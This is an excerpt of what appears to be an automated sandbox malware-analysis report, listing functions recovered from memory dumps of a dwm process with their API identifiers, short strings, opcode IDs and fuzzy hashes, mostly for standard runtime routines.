                                                                    • Instruction Fuzzy Hash: C151B232701610BAEF14CF65FA48B9937B6F386B88F108626DA0647BD8DB39D841CF04
                                                                    Function 000001D15B051A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: cffafc63ef7da6498ef0cebba608be49c4a53b156cf287e55d34ccb10077ee5b
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: 48F04432704641B2E7608FA1FA947D96774FB89B88FA44222DA4946994DF3CC64DCF00
                                                                    Function 000001D15B053044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 059001bd657afd4f18b0b9eb06f93f5c08b0a260b467af790de11fc56413785e
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: C8F05E30204B94B2EA008F93BA14299A270BB8AFD0F145222EE4607B58DF2CC445CB00
                                                                    Function 000001D15B05BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 60817a266186ffd5ae0b389ad19e37855eb8eb200dae3a8d96df2bc8910b6da5
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: F0F04971211A05B1EB109FA4B9443EA6331BBCABA1F64031ADA6A466E4DF2CC0488B40
                                                                    Function 000001D15B055710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction ID: 8415b5f6e4337be67fe1cf87370b15e569aa305e8a806eb37210339a3f2bebb0
                                                                    • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction Fuzzy Hash: F461C736619A84E6E7608B95F6443AAB7B4F7C9794F504216EA8E47FE8DB7CC440CF00
                                                                    Function 000001D15B023504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 30584bc57789e6ee81416ff34d8a95e2d7b77e77304d0cfcf3086ea6b74576e2
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: AE11A732610A2139FA5415E8F7523E9D1A07BDB3B4F98472BA96E063D6CB2CC88D4E00
                                                                    Function 000001D15B064104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: f154d825ef486956ac17134ede3eaf301d9146b2f68f12ee1dbb22238f6df103
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 39114F32A10A5135F6E41DE8F6573ED11617BEA3A8E390727A9770A6F68A2CC8414A00
                                                                    Function 000001D15B01F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: 4255c40cf4609273125910dc4f725253a0c0094a12a1b1d3e0a6b5997d5294aa
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 9D619C76600A40B2FA6D9BE9FF443EA6AB1B7C7790F544717DA0A077A5DB3CC8458E00
                                                                    Function 000001D15B05AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: ecd8f404aefe4a70aee2392ad535dc6f464d50b234bfc1b2f650c6c22913a0c1
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 73617C33600B94AAEB20DFA5E5403DD7BB0F385B98F044216EF8917B99DB38C595CB40
                                                                    Function 000001D15B01A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 7438c07df478a27d675d7ffde1f1338b61774b9e45e667ffbb933001aba2f3ff
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: D1516E32100390FAEB688F95AA4439977B0F396B94F184317EAA987BD5CB3CD491CF01
                                                                    Function 000001D15B05AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 87fff7ceb3fff8484939b3fd1be5d44b747eb6f995d69c837deec46775a4456a
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 90516B72100690BAEB648BA5B68439977F0F396B95F184317EA9A47FD5CB3CD491CF00
                                                                    Function 000001D15B018405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: a65d357b83cb533cf093432d5ab809af4dcfb38c6c0eda6697071d7300313a4c
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 2351A132701700BBDB18CF55FA44BA937B6F396B98F548226DA0643788FB38CA418F04
                                                                    Function 000001D15B0183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 935151499f3d542732ff949c3ca27a4128c0367f1ef5e7c9261de7048f993fb3
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: CB316832201740B6E7189F51FA44BA977B5F386B98F558216EE5A07788EF3CCA40CB04
                                                                    Function 000001D15B062058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: e8095c0bf12cea925dfb764fa2c2087b695501a488906d8e939ef66c29dff40c
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: 58D1F232B14A80B9E711CFB9E6403EC3BB1F396798F244316DE5997B99DA38C506CB40
                                                                    Function 000001D15B062980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: 1a5938fb0b4b7f06fe7ff9b9767d38bbddd4574939fdb3476fdf62bbf254b776
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: 4B91B172710654B5F760DFA5A6803ED3BB0F786B98F24520BDE0A67A95DB3DC482CB00
                                                                    Function 000001D15B057960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: 7ac540c36360077d2bb03e5280de5fa18fcba5f6162d9646d1b9464bc1305367
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: F3111836710B05AAEB008FA0E9553E833B4F79A758F541E22DA6D867A4DF7CC1988780
                                                                    Function 000001D15B05253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: 4712e03811c62814704c301d175ccd11233cd1b94cf41e545cffc125a711fcc3
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: 7F71D236200785B5EA25DFA6BA543EA67B8FBC6784F544217DD0A53FC8EA39C541CF00
                                                                    Function 000001D15B019E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 837f3a118a1ffc4853e67fdd03e407b5c6d28617691c74c45fea9710cc7b4a26
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 4D617D37601B84AAEB28DFA5E9803DD77B0F385B88F144216EF4917B99DB38D195CB00
                                                                    Function 000001D15B052330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: b2af9d506e5a093b844549a91f9da8a45d8f15b5d2524ee14e91f84bc7ad21da
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: D351C232204781B1E6659AAAB6683EA6771FBC7780F450227DE9903FD9DA3DD504CF40
                                                                    Function 000001D15B0626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: 0c81fe06ac8b69024cde43953864501d491a3a488173308e40205612be40c325
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: 5F41A232615A80A6EB209F65F9447EAA7B0F799794F508222EE4D87794DF3CC541CB40
                                                                    Function 000001D15B0594A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: f7a78db192f596ef0213e6bf90fb4f7c3a44ca554ea9d51a31fe73b7d7113a73
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: 08112832215B80A2EB618F15F544399B7E5FB89B94F584226EE8D07BA8DF3CC951CF00
                                                                    Function 000001D15B017356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 8f66a92c325a30d226c3968c140b7013ecc90217a4077a61c1c7d0017b0ed424
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 8EE04F61640B44B0DB028F61E9412D873A1AB99B64B889222995C46311FA3CD2E9C700
                                                                    Function 000001D15B0173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: 837328f5ae0287d0af7e7d5c6260f2d9ab2d69ed995cdf6e96feb25a95f52fd5
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 18E08671600B44B0DF018F61E9412E87371F799B64F88D223CD4C46311EA3CD1E9C700
                                                                    Function 000001D15B051BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: 893b037977a52874f594d0ae948f044da4d63379b3bec59708c6e358db46efdf
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: 8F115135601B44A1EA049F96A5043A977B1F7CAFC0F28422A9E4D477A5DF3DC4418740
                                                                    Function 000001D15B051268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: 5b8b7ba408355d8453f8dfaf1a7ac1922e645ee515dd1ded113a6ed497edc18e
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: DDE06D35601604A7EB048FA2E9083CA36F1FBCAF06F18C124C9094B361DF7DC499CB90